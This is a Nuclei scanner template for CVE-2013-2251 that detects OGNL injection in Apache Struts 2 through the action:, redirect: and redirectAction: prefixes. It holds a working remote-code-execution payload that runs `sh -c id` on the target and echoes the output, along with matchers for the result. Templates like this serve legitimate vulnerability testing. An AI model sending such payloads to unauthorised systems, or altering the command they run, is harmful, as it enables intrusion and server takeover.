

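# Nuclei template for CVE-2013-2251: OGNL injection through the Struts 2
# DefaultActionMapper "action:", "redirect:" and "redirectAction:" prefixes.
#
# WARNING: this is an intrusive, exploit-style check, not a version fingerprint.
# Every request evaluates an OGNL expression on the target that runs `sh -c id`
# through java.lang.ProcessBuilder and writes the command output into the HTTP
# response. Only run it against systems you are authorised to test.
id: CVE-2013-2251

info:
  name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
  author: exploitation & @dwisiswant0
  severity: critical
  description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
  tags: cve,cve2013,rce,struts,apache

requests:
  - payloads:
      # The three DefaultActionMapper prefixes whose argument is evaluated as
      # OGNL. §params§ in each raw request is replaced with every value in
      # turn, so one target receives 3 prefixes x 2 paths = 6 requests.
      params:
        - "redirect"
        - "action"
        - "redirectAction"
    raw:
      # URL-encoded OGNL payload (%23 = '#', %3d = '=', %27 = "'", %20 = space):
      #   #a = new ProcessBuilder(['sh','-c','id']).start()
      #   #b/#c/#d wrap #a's stdout in a BufferedReader; #d.read(#e) fills a
      #   50000-char buffer #e with the command output
      #   #matt = the HttpServletResponse taken from #context; println(#e),
      #   then flush() and close() so the output is the response body
      # A vulnerable target therefore answers with the raw output of `id`.
      - |
        GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en
      - |
        GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en

    # All three matchers must hit. The regex is the actual proof of command
    # execution; the status and word matchers only narrow the result.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 400
        condition: or

      # Output of `id`, e.g. "uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)".
      # The numeric id is unbounded and the account name allows [A-Za-z0-9._-]
      # so that uid=65534(nobody), ids above 9999 (user namespaces, LDAP/AD
      # ranges) and names such as "web_app" or "tomcat-8" are matched. The
      # previous pattern capped the id at four digits and the name at lowercase
      # alphanumerics, which silently produced false negatives for common
      # service accounts.
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]+\\([A-Za-z0-9._-]+\\)"

      # NOTE(review): because of the and-condition above, the body must also
      # contain one of these Struts/Tomcat strings. A vulnerable Struts app
      # served by a container that emits none of them would not be reported;
      # confirm that is intended before treating a non-match as "not vulnerable".
      - type: word
        words:
          - "There is no Action mapped for namespace"
          - "The origin server did not find a current representation for the target resource"
          - "Apache Tomcat"
        condition: or
        part: body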